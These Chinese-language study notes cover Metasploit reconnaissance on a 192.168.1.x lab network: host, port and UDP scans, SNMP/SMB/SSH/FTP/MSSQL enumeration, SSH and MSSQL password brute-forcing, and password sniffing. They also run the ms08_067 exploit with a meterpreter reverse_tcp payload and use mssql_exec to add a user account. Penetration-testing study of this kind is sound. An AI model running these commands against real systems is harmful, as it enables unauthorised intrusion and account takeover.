前言
本節學習信息收集
1、簡介
信息收集的模塊都在 auxiliary/scanner/ 之下
service postgresql start
msfconsole
msf > use auxiliary/scanner/ [TAB] #查看所有scanner
地址的使用方式
192.168.1.20-192.168.1.30、192.168.1.0/24,192.168.11.0/24
也可以編寫地址列表:file:/root/h.txt
2、db_nmap
跟 nmap 用法一樣,結果存放在 msf 的數據庫中
msf > db_nmap -sV 192.168.1.0/24
3、主機發現掃描
msf > search arp
msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(scanner/discovery/arp_sweep) > show options
msf auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24
msf auxiliary(scanner/discovery/arp_sweep) > set INTERFACE eth0
msf auxiliary(scanner/discovery/arp_sweep) > set THREADS 20 #線程數
msf auxiliary(scanner/discovery/arp_sweep) > run
#跟上面nmap掃描結果一樣
4、端口掃描
msf > search portscan
msf > use auxiliary/scanner/portscan/syn #選擇syn掃描
msf auxiliary(scanner/portscan/syn) > show options
msf auxiliary(scanner/portscan/syn) > set INTERFACE eth0
msf auxiliary(scanner/portscan/syn) > set PORTS 80
msf auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.1.0/24
msf auxiliary(scanner/portscan/syn) > set THREADS 50
msf auxiliary(scanner/portscan/syn) > run
5、殭屍掃描
查找 ipidseq 主機(查找殭屍機)
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(scanner/ip/ipidseq) > show options
msf auxiliary(scanner/ip/ipidseq) > set RHOSTS 192.168.1.1-150
msf auxiliary(scanner/ip/ipidseq) > set THREADS 20
msf auxiliary(scanner/ip/ipidseq) > run
也可以用nmap
msf > db_nmap -PN -sI 192.168.1.110
6、UDP 掃描
msf > use auxiliary/scanner/discovery/udp_sweep
msf auxiliary(scanner/discovery/udp_sweep) > show options
msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 192.168.1.1-150
msf auxiliary(scanner/discovery/udp_sweep) > run
udp_probe 與上面的 udp_sweep 用法略有不同
msf > use auxiliary/scanner/discovery/udp_probe
msf auxiliary(scanner/discovery/udp_probe) > show options
msf auxiliary(scanner/discovery/udp_probe) > set RHOSTS 192.168.1.1-150
msf auxiliary(scanner/discovery/udp_probe) > set CHOST 192.168.1.111
msf auxiliary(scanner/discovery/udp_probe) > set THREADS 20
msf auxiliary(scanner/discovery/udp_probe) > run
7、密碼嗅探
被動信息收集
支持從 pcap 抓包文件中提取密碼
功能類似於 dsniff
msf > search sniffer
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(sniffer/psnuffle) > show options
msf auxiliary(sniffer/psnuffle) > set INTERFACE eth0
msf auxiliary(sniffer/psnuffle) > run
#也可以從pcap讀取
msf auxiliary(sniffer/psnuffle) > set PCAPFILE /root/ftp.pcapng
msf auxiliary(sniffer/psnuffle) > jobs
msf auxiliary(sniffer/psnuffle) > kill 0 #把之前的kill
msf auxiliary(sniffer/psnuffle) > run
8、SNMP掃描
對linux
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login) > show options
msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS 192.168.1.111
msf auxiliary(scanner/snmp/snmp_login) > set THREADS 20
msf auxiliary(scanner/snmp/snmp_login) > run
msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(scanner/snmp/snmp_enum) > show options
msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.111
msf auxiliary(scanner/snmp/snmp_enum) > run
對windows
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(scanner/snmp/snmp_enumusers) > show options
msf auxiliary(scanner/snmp/snmp_enumusers) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 192.168.1.112
msf auxiliary(scanner/snmp/snmp_enumusers) > run
msf > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(scanner/snmp/snmp_enumshares) > show options
msf auxiliary(scanner/snmp/snmp_enumshares) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumshares) > set RHOSTS 192.168.1.112
msf auxiliary(scanner/snmp/snmp_enumshares) > run
9、SMB掃描
#版本掃描
msf > search smb
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > show options
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.122, 192.168.1.126
msf auxiliary(scanner/smb/smb_version) > run
msf auxiliary(scanner/smb/smb_version) > set SMBUser Administrator
msf auxiliary(scanner/smb/smb_version) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_version) > run
#掃描命令管道。判斷 SMB 服務類型(賬號、密碼)
msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(scanner/smb/pipe_auditor) > show options
msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/pipe_auditor) > run
msf auxiliary(scanner/smb/pipe_auditor) > set SMBUser Administrator
msf auxiliary(scanner/smb/pipe_auditor) > set SMBPass 123456
msf auxiliary(scanner/smb/pipe_auditor) > run
#SMB 共享賬號(賬號、密碼)
msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(scanner/smb/smb_enumshares) > show options
msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/smb_enumshares) > run
msf auxiliary(scanner/smb/smb_enumshares) > set SMBUser Administrator
msf auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_enumshares) > run
#SMB 用戶枚舉(賬號、密碼)
msf > use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(scanner/smb/smb_enumusers) > show options
msf auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/smb_enumusers) > run
#SID 枚舉(賬號、密碼)
msf > use auxiliary/scanner/smb/smb_lookupsid
msf auxiliary(scanner/smb/smb_lookupsid) > show options
msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/smb_lookupsid) > run
10、SSH掃描
#SSH 版本掃描
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ssh/ssh_version) > run
#SSH 密碼爆破
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt #這是個現成的密碼字典
msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE false
msf auxiliary(scanner/ssh/ssh_login) > run
#SSH 公鑰登陸
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set USERNAME root
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa_test_file
11、獲取 windows 缺少的補丁
基於已經取得的 session 進行檢測
若遇到報錯:known bug in WMI query, try migrating to another process
遷移到另一個進程再次進行嘗試
msf > use post/windows/gather/enum_patches
msf post(windows/gather/enum_patches) > set SESSION 4
msf post(windows/gather/enum_patches) > show advanced
msf post(windows/gather/enum_patches) > set VERBOSE yes
msf post(windows/gather/enum_patches) > run
#ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.1.126
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > run
12、mssql 掃描
mssql 掃描端口
默認端口:TCP 1433(也可能是動態端口)/ UDP 1434 (用於查詢實例的 TCP 端口號)
#嘗試ping,確定端口
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/mssql/mssql_ping) > run
#爆破 mssql 密碼
msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/mssql/mssql_login) > set username Administrator
msf auxiliary(scanner/mssql/mssql_login) > set password ... #選擇一個密碼字典
msf auxiliary(scanner/mssql/mssql_login) > run
#遠程執行代碼(獲取數據庫權限之後)
msf > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set RHOSTS 192.168.1.114 #自己的kali
msf auxiliary(admin/mssql/mssql_exec) > set username Administrator
msf auxiliary(admin/mssql/mssql_exec) > set password ... #這裏是破解出來的密碼
msf auxiliary(admin/mssql/mssql_exec) > set CMD net user user1 pass123 /ADD #執行代碼,在數據庫裏面加一個賬號
13、FTP 掃描
#查詢版本信息
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ftp/ftp_version) > run
#是否允許匿名登錄
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ftp/anonymous) > run
#暴力破解
msf > use auxiliary/scanner/ftp/ftp_login
結語
可以發現
用msf進行信息收集的手段非常豐富
當然其中許多效果和原理都與之前學的類似